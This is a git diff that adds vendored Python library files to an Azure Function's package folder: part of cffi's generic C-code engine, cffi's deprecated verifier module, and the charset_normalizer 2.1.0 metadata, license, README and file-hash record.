(unsigned long)(%s));' % + name) + prnt(' sprintf(out_error, "%s has the real value %s, not %s",') + prnt(' "%s", buf, "%d");' % (name[:100], value)) + prnt(' return -1;') + prnt(' }') + + def _load_known_int_constant(self, module, funcname): + BType = self.ffi._typeof_locked("char[]")[0] + BFunc = self.ffi._typeof_locked("int(*)(char*)")[0] + function = module.load_function(BFunc, funcname) + p = self.ffi.new(BType, 256) + if function(p) < 0: + error = self.ffi.string(p) + if sys.version_info >= (3,): + error = str(error, 'utf-8') + raise VerificationError(error) + + def _enum_funcname(self, prefix, name): + # "$enum_$1" => "___D_enum____D_1" + name = name.replace('$', '___D_') + return '_cffi_e_%s_%s' % (prefix, name) + + def _generate_gen_enum_decl(self, tp, name, prefix='enum'): + if tp.partial: + for enumerator in tp.enumerators: + self._generate_gen_const(True, enumerator) + return + # + funcname = self._enum_funcname(prefix, name) + self.export_symbols.append(funcname) + prnt = self._prnt + prnt('int %s(char *out_error)' % funcname) + prnt('{') + for enumerator, enumvalue in zip(tp.enumerators, tp.enumvalues): + self._check_int_constant_value(enumerator, enumvalue) + prnt(' return 0;') + prnt('}') + prnt() + + def _loading_gen_enum(self, tp, name, module, prefix='enum'): + if tp.partial: + enumvalues = [self._load_constant(True, tp, enumerator, module) + for enumerator in tp.enumerators] + tp.enumvalues = tuple(enumvalues) + tp.partial_resolved = True + else: + funcname = self._enum_funcname(prefix, name) + self._load_known_int_constant(module, funcname) + + def _loaded_gen_enum(self, tp, name, module, library): + for enumerator, enumvalue in zip(tp.enumerators, tp.enumvalues): + setattr(library, enumerator, enumvalue) + type(library)._cffi_dir.append(enumerator) + + # ---------- + # macros: for now only for integers + + def _generate_gen_macro_decl(self, tp, name): + if tp == '...': + check_value = None + else: + check_value = tp # an integer + self._generate_gen_const(True, name, check_value=check_value) + + _loading_gen_macro = _loaded_noop + + def _loaded_gen_macro(self, tp, name, module, library): + if tp == '...': + check_value = None + else: + check_value = tp # an integer + value = self._load_constant(True, tp, name, module, + check_value=check_value) + setattr(library, name, value) + type(library)._cffi_dir.append(name) + + # ---------- + # global variables + + def _generate_gen_variable_decl(self, tp, name): + if isinstance(tp, model.ArrayType): + if tp.length_is_unknown(): + prnt = self._prnt + funcname = '_cffi_sizeof_%s' % (name,) + self.export_symbols.append(funcname) + prnt("size_t %s(void)" % funcname) + prnt("{") + prnt(" return sizeof(%s);" % (name,)) + prnt("}") + tp_ptr = model.PointerType(tp.item) + self._generate_gen_const(False, name, tp_ptr) + else: + tp_ptr = model.PointerType(tp) + self._generate_gen_const(False, name, tp_ptr, category='var') + + _loading_gen_variable = _loaded_noop + + def _loaded_gen_variable(self, tp, name, module, library): + if isinstance(tp, model.ArrayType): # int a[5] is "constant" in the + # sense that "a=..." 
is forbidden + if tp.length_is_unknown(): + funcname = '_cffi_sizeof_%s' % (name,) + BFunc = self.ffi._typeof_locked('size_t(*)(void)')[0] + function = module.load_function(BFunc, funcname) + size = function() + BItemType = self.ffi._get_cached_btype(tp.item) + length, rest = divmod(size, self.ffi.sizeof(BItemType)) + if rest != 0: + raise VerificationError( + "bad size: %r does not seem to be an array of %s" % + (name, tp.item)) + tp = tp.resolve_length(length) + tp_ptr = model.PointerType(tp.item) + value = self._load_constant(False, tp_ptr, name, module) + # 'value' is a <cdata 'type *'> which we have to replace with + # a <cdata 'type[N]'> if the N is actually known + if tp.length is not None: + BArray = self.ffi._get_cached_btype(tp) + value = self.ffi.cast(BArray, value) + setattr(library, name, value) + type(library)._cffi_dir.append(name) + return + # remove ptr=<cdata 'type'> from the library instance, and replace + # it by a property on the class, which reads/writes into ptr[0]. + funcname = '_cffi_var_%s' % name + BFunc = self.ffi._typeof_locked(tp.get_c_name('*(*)(void)', name))[0] + function = module.load_function(BFunc, funcname) + ptr = function() + def getter(library): + return ptr[0] + def setter(library, value): + ptr[0] = value + setattr(type(library), name, property(getter, setter)) + type(library)._cffi_dir.append(name) + +cffimod_header = r''' +#include <stdio.h> +#include <stddef.h> +#include <stdarg.h> +#include <errno.h> +#include <sys/types.h> /* XXX for ssize_t on some platforms */ + +/* this block of #ifs should be kept exactly identical between + c/_cffi_backend.c, cffi/vengine_cpy.py, cffi/vengine_gen.py + and cffi/_cffi_include.h */ +#if defined(_MSC_VER) +# include <malloc.h> /* for alloca() */ +# if _MSC_VER < 1600 /* MSVC < 2010 */ + typedef __int8 int8_t; + typedef __int16 int16_t; + typedef __int32 int32_t; + typedef __int64 int64_t; + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + typedef unsigned __int64 uint64_t; + typedef __int8 int_least8_t; + typedef __int16 int_least16_t; + typedef __int32 int_least32_t; + typedef __int64 int_least64_t; + typedef unsigned __int8 uint_least8_t; + typedef unsigned __int16 uint_least16_t; + typedef unsigned __int32 uint_least32_t; + typedef unsigned __int64 uint_least64_t; + typedef __int8 int_fast8_t; + typedef __int16 int_fast16_t; + typedef __int32 int_fast32_t; + typedef __int64 int_fast64_t; + typedef unsigned __int8 uint_fast8_t; + typedef unsigned __int16 uint_fast16_t; + typedef unsigned __int32 uint_fast32_t; + typedef unsigned __int64 uint_fast64_t; + typedef __int64 intmax_t; + typedef unsigned __int64 uintmax_t; +# else +# include <stdint.h> +# endif +# if _MSC_VER < 1800 /* MSVC < 2013 */ +# ifndef __cplusplus + typedef unsigned char _Bool; +# endif +# endif +#else +# include <stdint.h> +# if (defined (__SVR4) && defined (__sun)) || defined(_AIX) || defined(__hpux) +# include <alloca.h> +# endif +#endif +''' diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/verifier.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/verifier.py new file mode 100644 index 0000000..9fbfef2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/verifier.py @@ -0,0 +1,307 @@ +# +# DEPRECATED: implementation for ffi.verify() +# +import sys, os, binascii, shutil, io +from . import __version_verifier_modules__ +from . 
import ffiplatform +from .error import VerificationError + +if sys.version_info >= (3, 3): + import importlib.machinery + def _extension_suffixes(): + return importlib.machinery.EXTENSION_SUFFIXES[:] +else: + import imp + def _extension_suffixes(): + return [suffix for suffix, _, type in imp.get_suffixes() + if type == imp.C_EXTENSION] + + +if sys.version_info >= (3,): + NativeIO = io.StringIO +else: + class NativeIO(io.BytesIO): + def write(self, s): + if isinstance(s, unicode): + s = s.encode('ascii') + super(NativeIO, self).write(s) + + +class Verifier(object): + + def __init__(self, ffi, preamble, tmpdir=None, modulename=None, + ext_package=None, tag='', force_generic_engine=False, + source_extension='.c', flags=None, relative_to=None, **kwds): + if ffi._parser._uses_new_feature: + raise VerificationError( + "feature not supported with ffi.verify(), but only " + "with ffi.set_source(): %s" % (ffi._parser._uses_new_feature,)) + self.ffi = ffi + self.preamble = preamble + if not modulename: + flattened_kwds = ffiplatform.flatten(kwds) + vengine_class = _locate_engine_class(ffi, force_generic_engine) + self._vengine = vengine_class(self) + self._vengine.patch_extension_kwds(kwds) + self.flags = flags + self.kwds = self.make_relative_to(kwds, relative_to) + # + if modulename: + if tag: + raise TypeError("can't specify both 'modulename' and 'tag'") + else: + key = '\x00'.join(['%d.%d' % sys.version_info[:2], + __version_verifier_modules__, + preamble, flattened_kwds] + + ffi._cdefsources) + if sys.version_info >= (3,): + key = key.encode('utf-8') + k1 = hex(binascii.crc32(key[0::2]) & 0xffffffff) + k1 = k1.lstrip('0x').rstrip('L') + k2 = hex(binascii.crc32(key[1::2]) & 0xffffffff) + k2 = k2.lstrip('0').rstrip('L') + modulename = '_cffi_%s_%s%s%s' % (tag, self._vengine._class_key, + k1, k2) + suffix = _get_so_suffixes()[0] + self.tmpdir = tmpdir or _caller_dir_pycache() + self.sourcefilename = os.path.join(self.tmpdir, modulename + source_extension) + self.modulefilename = os.path.join(self.tmpdir, modulename + suffix) + self.ext_package = ext_package + self._has_source = False + self._has_module = False + + def write_source(self, file=None): + """Write the C source code. It is produced in 'self.sourcefilename', + which can be tweaked beforehand.""" + with self.ffi._lock: + if self._has_source and file is None: + raise VerificationError( + "source code already written") + self._write_source(file) + + def compile_module(self): + """Write the C source code (if not done already) and compile it. + This produces a dynamic link library in 'self.modulefilename'.""" + with self.ffi._lock: + if self._has_module: + raise VerificationError("module already compiled") + if not self._has_source: + self._write_source() + self._compile_module() + + def load_library(self): + """Get a C module from this Verifier instance. + Returns an instance of a FFILibrary class that behaves like the + objects returned by ffi.dlopen(), but that delegates all + operations to the C module. If necessary, the C code is written + and compiled first. 
+ """ + with self.ffi._lock: + if not self._has_module: + self._locate_module() + if not self._has_module: + if not self._has_source: + self._write_source() + self._compile_module() + return self._load_library() + + def get_module_name(self): + basename = os.path.basename(self.modulefilename) + # kill both the .so extension and the other .'s, as introduced + # by Python 3: 'basename.cpython-33m.so' + basename = basename.split('.', 1)[0] + # and the _d added in Python 2 debug builds --- but try to be + # conservative and not kill a legitimate _d + if basename.endswith('_d') and hasattr(sys, 'gettotalrefcount'): + basename = basename[:-2] + return basename + + def get_extension(self): + ffiplatform._hack_at_distutils() # backward compatibility hack + if not self._has_source: + with self.ffi._lock: + if not self._has_source: + self._write_source() + sourcename = ffiplatform.maybe_relative_path(self.sourcefilename) + modname = self.get_module_name() + return ffiplatform.get_extension(sourcename, modname, **self.kwds) + + def generates_python_module(self): + return self._vengine._gen_python_module + + def make_relative_to(self, kwds, relative_to): + if relative_to and os.path.dirname(relative_to): + dirname = os.path.dirname(relative_to) + kwds = kwds.copy() + for key in ffiplatform.LIST_OF_FILE_NAMES: + if key in kwds: + lst = kwds[key] + if not isinstance(lst, (list, tuple)): + raise TypeError("keyword '%s' should be a list or tuple" + % (key,)) + lst = [os.path.join(dirname, fn) for fn in lst] + kwds[key] = lst + return kwds + + # ---------- + + def _locate_module(self): + if not os.path.isfile(self.modulefilename): + if self.ext_package: + try: + pkg = __import__(self.ext_package, None, None, ['__doc__']) + except ImportError: + return # cannot import the package itself, give up + # (e.g. it might be called differently before installation) + path = pkg.__path__ + else: + path = None + filename = self._vengine.find_module(self.get_module_name(), path, + _get_so_suffixes()) + if filename is None: + return + self.modulefilename = filename + self._vengine.collect_types() + self._has_module = True + + def _write_source_to(self, file): + self._vengine._f = file + try: + self._vengine.write_source_to_f() + finally: + del self._vengine._f + + def _write_source(self, file=None): + if file is not None: + self._write_source_to(file) + else: + # Write our source file to an in memory file. 
+ f = NativeIO() + self._write_source_to(f) + source_data = f.getvalue() + + # Determine if this matches the current file + if os.path.exists(self.sourcefilename): + with open(self.sourcefilename, "r") as fp: + needs_written = not (fp.read() == source_data) + else: + needs_written = True + + # Actually write the file out if it doesn't match + if needs_written: + _ensure_dir(self.sourcefilename) + with open(self.sourcefilename, "w") as fp: + fp.write(source_data) + + # Set this flag + self._has_source = True + + def _compile_module(self): + # compile this C source + tmpdir = os.path.dirname(self.sourcefilename) + outputfilename = ffiplatform.compile(tmpdir, self.get_extension()) + try: + same = ffiplatform.samefile(outputfilename, self.modulefilename) + except OSError: + same = False + if not same: + _ensure_dir(self.modulefilename) + shutil.move(outputfilename, self.modulefilename) + self._has_module = True + + def _load_library(self): + assert self._has_module + if self.flags is not None: + return self._vengine.load_library(self.flags) + else: + return self._vengine.load_library() + +# ____________________________________________________________ + +_FORCE_GENERIC_ENGINE = False # for tests + +def _locate_engine_class(ffi, force_generic_engine): + if _FORCE_GENERIC_ENGINE: + force_generic_engine = True + if not force_generic_engine: + if '__pypy__' in sys.builtin_module_names: + force_generic_engine = True + else: + try: + import _cffi_backend + except ImportError: + _cffi_backend = '?' + if ffi._backend is not _cffi_backend: + force_generic_engine = True + if force_generic_engine: + from . import vengine_gen + return vengine_gen.VGenericEngine + else: + from . import vengine_cpy + return vengine_cpy.VCPythonEngine + +# ____________________________________________________________ + +_TMPDIR = None + +def _caller_dir_pycache(): + if _TMPDIR: + return _TMPDIR + result = os.environ.get('CFFI_TMPDIR') + if result: + return result + filename = sys._getframe(2).f_code.co_filename + return os.path.abspath(os.path.join(os.path.dirname(filename), + '__pycache__')) + +def set_tmpdir(dirname): + """Set the temporary directory to use instead of __pycache__.""" + global _TMPDIR + _TMPDIR = dirname + +def cleanup_tmpdir(tmpdir=None, keep_so=False): + """Clean up the temporary directory by removing all files in it + called `_cffi_*.{c,so}` as well as the `build` subdirectory.""" + tmpdir = tmpdir or _caller_dir_pycache() + try: + filelist = os.listdir(tmpdir) + except OSError: + return + if keep_so: + suffix = '.c' # only remove .c files + else: + suffix = _get_so_suffixes()[0].lower() + for fn in filelist: + if fn.lower().startswith('_cffi_') and ( + fn.lower().endswith(suffix) or fn.lower().endswith('.c')): + try: + os.unlink(os.path.join(tmpdir, fn)) + except OSError: + pass + clean_dir = [os.path.join(tmpdir, 'build')] + for dir in clean_dir: + try: + for fn in os.listdir(dir): + fn = os.path.join(dir, fn) + if os.path.isdir(fn): + clean_dir.append(fn) + else: + os.unlink(fn) + except OSError: + pass + +def _get_so_suffixes(): + suffixes = _extension_suffixes() + if not suffixes: + # bah, no C_EXTENSION available. 
Occurs on pypy without cpyext + if sys.platform == 'win32': + suffixes = [".pyd"] + else: + suffixes = [".so"] + + return suffixes + +def _ensure_dir(filename): + dirname = os.path.dirname(filename) + if dirname and not os.path.isdir(dirname): + os.makedirs(dirname) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/LICENSE new file mode 100644 index 0000000..6da2297 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2019 TAHRI Ahmed R. + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/METADATA new file mode 100644 index 0000000..e6e87cf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/METADATA @@ -0,0 +1,269 @@ +Metadata-Version: 2.1 +Name: charset-normalizer +Version: 2.1.0 +Summary: The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet. 
+Home-page: https://github.com/ousret/charset_normalizer +Author: Ahmed TAHRI @Ousret +Author-email: ahmed.tahri@cloudnursery.dev +License: MIT +Project-URL: Bug Reports, https://github.com/Ousret/charset_normalizer/issues +Project-URL: Documentation, https://charset-normalizer.readthedocs.io/en/latest +Keywords: encoding,i18n,txt,text,charset,charset-detector,normalization,unicode,chardet +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: License :: OSI Approved :: MIT License +Classifier: Intended Audience :: Developers +Classifier: Topic :: Software Development :: Libraries :: Python Modules +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Topic :: Text Processing :: Linguistic +Classifier: Topic :: Utilities +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Typing :: Typed +Requires-Python: >=3.6.0 +Description-Content-Type: text/markdown +License-File: LICENSE +Provides-Extra: unicode_backport +Requires-Dist: unicodedata2 ; extra == 'unicode_backport' + + +

Charset Detection, for Everyone 👋


+ The Real First Universal Charset Detector

+ +> A library that helps you read text from an unknown charset encoding.
Motivated by `chardet`, +> I'm trying to resolve the issue by taking a new approach. +> All IANA character set names for which the Python core library provides codecs are supported. + +
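+
+As a quick taste of the API, here is a minimal sketch adapted from the package docstring (the sample text is purely illustrative):
+
+```python
+from charset_normalizer import from_bytes
+
+# Raw bytes of unknown encoding in, ranked guesses out.
+payload = "Bсеки човек има право на образование.".encode("utf_8")
+best_guess = from_bytes(payload).best()  # may be None if nothing fits
+
+if best_guess is not None:
+    print(best_guess.encoding)  # e.g. 'utf_8'
+    print(str(best_guess))      # the decoded, readable text
+```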

+ >>>>> 👉 Try Me Online Now, Then Adopt Me 👈 <<<<< +

+
+This project offers you an alternative to **Universal Charset Encoding Detector**, also known as **Chardet**.
+
+| Feature | [Chardet](https://github.com/chardet/chardet) | Charset Normalizer | [cChardet](https://github.com/PyYoshi/cChardet) |
+| ------------- | :-------------: | :------------------: | :------------------: |
+| `Fast` | ❌ | ✅ | ✅ |
+| `Universal**` | ❌ | ✅ | ❌ |
+| `Reliable` **without** distinguishable standards | ❌ | ✅ | ✅ |
+| `Reliable` **with** distinguishable standards | ✅ | ✅ | ✅ |
+| `Free & Open` | ✅ | ✅ | ✅ |
+| `License` | LGPL-2.1 | MIT | MPL-1.1 |
+| `Native Python` | ✅ | ✅ | ❌ |
+| `Detect spoken language` | ❌ | ✅ | N/A |
+| `Supported Encoding` | 30 | :tada: [93](https://charset-normalizer.readthedocs.io/en/latest/user/support.html#supported-encodings) | 40 |

+*\*\* : They rely on code written for specific encodings, even though they cover most encodings in common use.*
+Did you get here because of the logs? See [https://charset-normalizer.readthedocs.io/en/latest/user/miscellaneous.html](https://charset-normalizer.readthedocs.io/en/latest/user/miscellaneous.html)
+
+## ⭐ Your support
+
+*Fork it, test it, star it, submit your ideas! We do listen.*
+
+## ⚡ Performance
+
+This package offers better performance than its counterpart Chardet. Here are some numbers.
+
+| Package | Accuracy | Mean per file (ms) | File per sec (est) |
+| ------------- | :-------------: | :------------------: | :------------------: |
+| [chardet](https://github.com/chardet/chardet) | 92 % | 200 ms | 5 file/sec |
+| charset-normalizer | **98 %** | **39 ms** | 26 file/sec |
+
+| Package | 99th percentile | 95th percentile | 50th percentile |
+| ------------- | :-------------: | :------------------: | :------------------: |
+| [chardet](https://github.com/chardet/chardet) | 1200 ms | 287 ms | 23 ms |
+| charset-normalizer | 400 ms | 200 ms | 15 ms |
+
+Chardet's performance on larger files (1 MB+) is very poor. Expect a huge difference on large payloads.
+
+> Stats are generated from 400+ files using default parameters. For details on the files used, see the GHA workflows.
+> And yes, these results might change at any time. The dataset can be updated to include more files.
+> The actual delays depend heavily on your CPU capabilities, but the relative factors should remain the same.
+
+[cchardet](https://github.com/PyYoshi/cChardet) is a faster, non-native (C++ binding), unmaintained alternative with
+better accuracy than chardet but lower than this package. If speed is the most important factor, you should try it.
+
+## ✨ Installation
+
+Using PyPI for the latest stable release:
+```sh
+pip install charset-normalizer -U
+```
+
+If you want a more up-to-date `unicodedata` than the one shipped with your Python setup:
+```sh
+pip install charset-normalizer[unicode_backport] -U
+```
+
+## 🚀 Basic Usage
+
+### CLI
+This package comes with a CLI.
+
+```
+usage: normalizer [-h] [-v] [-a] [-n] [-m] [-r] [-f] [-t THRESHOLD]
+                  file [file ...]
+
+The Real First Universal Charset Detector. Discover originating encoding used
+on text file. Normalize text to unicode.
+
+positional arguments:
+  files                 File(s) to be analysed
+
+optional arguments:
+  -h, --help            show this help message and exit
+  -v, --verbose         Display complementary information about file if any.
+                        Stdout will contain logs about the detection process.
+  -a, --with-alternative
+                        Output complementary possibilities if any. Top-level
+                        JSON WILL be a list.
+  -n, --normalize       Permit to normalize input file. If not set, program
+                        does not write anything.
+  -m, --minimal         Only output the charset detected to STDOUT. Disabling
+                        JSON output.
+  -r, --replace         Replace file when trying to normalize it instead of
+                        creating a new one.
+  -f, --force           Replace file without asking if you are sure, use this
+                        flag with caution.
+  -t THRESHOLD, --threshold THRESHOLD
+                        Define a custom maximum amount of chaos allowed in
+                        decoded content. 0. <= chaos <= 1.
+  --version             Show version information and exit.
+```
+
+```bash
+normalizer ./data/sample.1.fr.srt
+```
+
+:tada: Since version 1.4.0, the CLI produces an easily usable JSON result on stdout.
+
+```json
+{
+    "path": "/home/default/projects/charset_normalizer/data/sample.1.fr.srt",
+    "encoding": "cp1252",
+    "encoding_aliases": [
+        "1252",
+        "windows_1252"
+    ],
+    "alternative_encodings": [
+        "cp1254",
+        "cp1256",
+        "cp1258",
+        "iso8859_14",
+        "iso8859_15",
+        "iso8859_16",
+        "iso8859_3",
+        "iso8859_9",
+        "latin_1",
+        "mbcs"
+    ],
+    "language": "French",
+    "alphabets": [
+        "Basic Latin",
+        "Latin-1 Supplement"
+    ],
+    "has_sig_or_bom": false,
+    "chaos": 0.149,
+    "coherence": 97.152,
+    "unicode_path": null,
+    "is_preferred": true
+}
+```
+
+### Python
+*Just print out normalized text*
+```python
+from charset_normalizer import from_path
+
+results = from_path('./my_subtitle.srt')
+
+print(str(results.best()))
+```
+
+*Normalize any text file*
+```python
+from charset_normalizer import normalize
+try:
+    normalize('./my_subtitle.srt') # should write to disk my_subtitle-***.srt
+except IOError as e:
+    print('Sadly, we are unable to perform charset normalization.', str(e))
+```
+
+*Upgrade your code without effort*
+```python
+from charset_normalizer import detect
+```
+
+The above import behaves the same as **chardet**'s `detect`. We ensure that we offer the best (reasonable) backward-compatible result possible.
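+
+For instance, here is a minimal sketch of the drop-in call (the sample bytes are purely illustrative); `detect` returns a chardet-style mapping with `encoding`, `language` and `confidence` keys:
+
+```python
+from charset_normalizer import detect
+
+# Same call shape as chardet.detect(): bytes in, dict out.
+result = detect("Où est le café ?".encode("cp1252"))
+
+print(result["encoding"])    # guessed codec name, or None
+print(result["language"])    # best-effort language guess
+print(result["confidence"])  # float between 0. and 1.
+```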
+See the docs for advanced usage: [readthedocs.io](https://charset-normalizer.readthedocs.io/en/latest/)
+
+## 😇 Why
+
+When I started using Chardet, I noticed that it was not suited to my expectations, and I wanted to propose a
+reliable alternative using a completely different method. Also! I never back down from a good challenge!
+
+I **don't care** about the **originating charset** encoding, because **two different tables** can
+produce **two identical rendered strings.**
+What I want is to get readable text, the best I can.
+
+In a way, **I'm brute forcing text decoding.** How cool is that? 😎
+
+Don't confuse the **ftfy** package with charset-normalizer or chardet. ftfy's goal is to repair broken Unicode strings, whereas charset-normalizer's is to convert a raw file in an unknown encoding to Unicode.
+
+## 🍰 How
+
+ - Discard all charset encoding tables that could not fit the binary content.
+ - Measure the chaos, or mess, once the content is opened (in chunks) with a corresponding charset encoding.
+ - Extract the matches with the lowest mess detected.
+ - Additionally, we measure coherence / probe for a language.
+
+**Wait a minute**, what are chaos/mess and coherence according to **YOU?**
+
+*Chaos:* I opened hundreds of text files, **written by humans**, with the wrong encoding table. **I observed**, then
+**I established** some ground rules about **what is obvious** when **it seems like** a mess.
+I know that my interpretation of what is chaotic is very subjective; feel free to contribute in order to
+improve or rewrite it.
+
+*Coherence:* For each language on earth, we have computed ranked letter-appearance occurrences (as best we can). So I thought
+that intel is worth something here. So I use those records against decoded text to check if I can detect intelligent design.
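+
+To make that intuition concrete, here is a toy sketch of the two signals. This is **not** the library's actual scoring (that lives in `md.py`'s `mess_ratio` and `cd.py`'s `coherence_ratio`); the rules below are illustrative only:
+
+```python
+from collections import Counter
+
+def toy_chaos(text: str) -> float:
+    # "Mess": share of characters that look out of place in human-written text.
+    suspicious = sum(1 for c in text if not (c.isprintable() or c.isspace()))
+    return suspicious / max(len(text), 1)
+
+def toy_coherence(text: str, ranked_letters: list) -> float:
+    # "Coherence": overlap between the text's most frequent letters and the
+    # ranked letter frequencies of a candidate language.
+    most_common = [c for c, _ in Counter(text.lower()).most_common() if c.isalpha()][:26]
+    hits = sum(1 for c in most_common if c in ranked_letters)
+    return hits / max(len(most_common), 1)
+
+english = ["e", "a", "t", "i", "o", "n", "s", "r", "h", "l"]
+sample = "The quick brown fox jumps over the lazy dog."
+print(toy_chaos(sample))               # low  -> plausible decoding
+print(toy_coherence(sample, english))  # high -> looks like English
+```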
+## ⚡ Known limitations
+
+ - Language detection is unreliable when the text contains two or more languages sharing identical letters (e.g. HTML with English tags plus Turkish content, which share Latin characters).
+ - Every charset detector heavily depends on having sufficient content. In common cases, do not bother running detection on very tiny content.
+
+## 👤 Contributing
+
+Contributions, issues and feature requests are very much welcome.
+Feel free to check the [issues page](https://github.com/ousret/charset_normalizer/issues) if you want to contribute.
+
+## 📝 License
+
+Copyright © 2019 [Ahmed TAHRI @Ousret](https://github.com/Ousret).
+This project is [MIT](https://github.com/Ousret/charset_normalizer/blob/master/LICENSE) licensed.
+
+Characters frequencies used in this project © 2012 [Denny Vrandečić](http://simia.net/letters/)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/RECORD
new file mode 100644
index 0000000..4bb3a80
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/RECORD
@@ -0,0 +1,33 @@
+../../bin/normalizer,sha256=_6VNRnw7MyVCL-CINQ044FaHcpLHwQVgd-_D0cWq4KI,244
+charset_normalizer-2.1.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4
+charset_normalizer-2.1.0.dist-info/LICENSE,sha256=6zGgxaT7Cbik4yBV0lweX5w1iidS_vPNcgIT0cz-4kE,1070
+charset_normalizer-2.1.0.dist-info/METADATA,sha256=PqR4yIS_Cr-NWPWOpEKrGzb8HltKDlD8-vXz-cMTaog,11718
+charset_normalizer-2.1.0.dist-info/RECORD,,
+charset_normalizer-2.1.0.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92
+charset_normalizer-2.1.0.dist-info/entry_points.txt,sha256=5AJq_EPtGGUwJPgQLnBZfbVr-FYCIwT0xP7dIEZO3NI,77
+charset_normalizer-2.1.0.dist-info/top_level.txt,sha256=7ASyzePr8_xuZWJsnqJjIBtyV8vhEo0wBCv1MPRRi3Q,19
+charset_normalizer/__init__.py,sha256=x2A2OW29MBcqdxsvy6t1wzkUlH3ma0guxL6ZCfS8J94,1790
+charset_normalizer/__pycache__/__init__.cpython-39.pyc,,
+charset_normalizer/__pycache__/api.cpython-39.pyc,,
+charset_normalizer/__pycache__/cd.cpython-39.pyc,,
+charset_normalizer/__pycache__/constant.cpython-39.pyc,,
+charset_normalizer/__pycache__/legacy.cpython-39.pyc,,
+charset_normalizer/__pycache__/md.cpython-39.pyc,,
+charset_normalizer/__pycache__/models.cpython-39.pyc,,
+charset_normalizer/__pycache__/utils.cpython-39.pyc,,
+charset_normalizer/__pycache__/version.cpython-39.pyc,,
+charset_normalizer/api.py,sha256=LwJ32ZBLv79ehfWN8nss7F--QkssNQIOQyjD1_t9a70,18960
+charset_normalizer/assets/__init__.py,sha256=ZXzdy-3PHtCldBTF-3tDI9qERLKp9AN-yt-sB6fIMFs,15222
+charset_normalizer/assets/__pycache__/__init__.cpython-39.pyc,,
+charset_normalizer/cd.py,sha256=gUwdMn2Du-u31I4VlmGK2C5x1z_V6vhqFfEIp9w1uE0,10780
+charset_normalizer/cli/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0
+charset_normalizer/cli/__pycache__/__init__.cpython-39.pyc,,
+charset_normalizer/cli/__pycache__/normalizer.cpython-39.pyc,,
+charset_normalizer/cli/normalizer.py,sha256=NmT5GSdXx0UJFxZaSp_DjPudcwc7JTB-MY3rfemgTpY,9501
+charset_normalizer/constant.py,sha256=NgU-pY8JH2a9lkVT8oKwAFmIUYNKOuSBwZgF9MrlNCM,19157
+charset_normalizer/legacy.py,sha256=XKeZOts_HdYQU_Jb3C9ZfOjY2CiUL132k9_nXer8gig,3384
+charset_normalizer/md.py,sha256=pZP8IVpSC82D8INA9Tf_y0ijJSRI-UIncZvLdfTWEd4,17642
+charset_normalizer/models.py,sha256=WkEr3Zr4m8VBxp3_2hMXhFFvRWDqoLDXKRDtAqBKMQg,13087
+charset_normalizer/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0
+charset_normalizer/utils.py,sha256=Z-VtLSynph2jMGpzZ5rgx21RM_4ALVpT63B5lQ7xreY,11726
